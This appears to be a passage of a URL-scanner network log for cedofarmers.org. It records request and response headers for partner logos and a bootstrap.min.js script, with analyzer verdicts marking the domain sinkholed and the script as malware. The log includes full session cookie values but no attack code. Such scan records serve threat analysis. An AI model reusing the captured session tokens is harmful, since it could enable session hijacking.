Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 06:39:12 GMT
accept-ranges: bytes
content-length: 410126
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226204-pabra_logo.jpg
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226204-pabra_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226204-pabra_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:24 GMT
accept-ranges: bytes
content-length: 77922
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226229-unigeorg_logo.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226229-unigeorg_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226229-unigeorg_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:23:50 GMT
accept-ranges: bytes
content-length: 1387462
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226154-mastercardlabs_logo.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226154-mastercardlabs_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226154-mastercardlabs_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:22:34 GMT
accept-ranges: bytes
content-length: 54162
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604666872-Alliance%20Bioversity%20%20CIAT.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604666872-Alliance%20Bioversity%20%20CIAT.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604666872-Alliance%20Bioversity%20%20CIAT.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 06 Nov 2020 09:47:54 GMT
accept-ranges: bytes
content-length: 116714
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226071-ford-foundation_logo.jpg
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226071-ford-foundation_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226071-ford-foundation_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:10 GMT
accept-ranges: bytes
content-length: 101564
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226057-crs_logo.jpg
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226057-crs_logo.jpg
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226057-crs_logo.jpg HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:56 GMT
accept-ranges: bytes
content-length: 47794
content-type: image/jpeg
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226034-bmz_logo.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226034-bmz_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226034-bmz_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:20:34 GMT
accept-ranges: bytes
content-length: 78907
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/sliders/1604145998-OSProots.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/sliders/1604145998-OSProots.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/sliders/1604145998-OSProots.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 31 Oct 2020 12:06:38 GMT
accept-ranges: bytes
content-length: 1320099
content-type: image/png
date: Tue, 08 Nov 2022 22:20:37 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/bootstrap.min.js
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/js/bootstrap.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/bootstrap.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226079-harvestplus.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226079-harvestplus.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226079-harvestplus.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:18 GMT
accept-ranges: bytes
content-length: 106875
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/partners/1604226105-iowauni_logo.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/partners/1604226105-iowauni_logo.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/partners/1604226105-iowauni_logo.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sun, 01 Nov 2020 10:21:46 GMT
accept-ranges: bytes
content-length: 349764
content-type: image/png
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/uploads/sliders/1604145960-dreamsbgslider.png
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/uploads/sliders/1604145960-dreamsbgslider.png
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /uploads/sliders/1604145960-dreamsbgslider.png HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
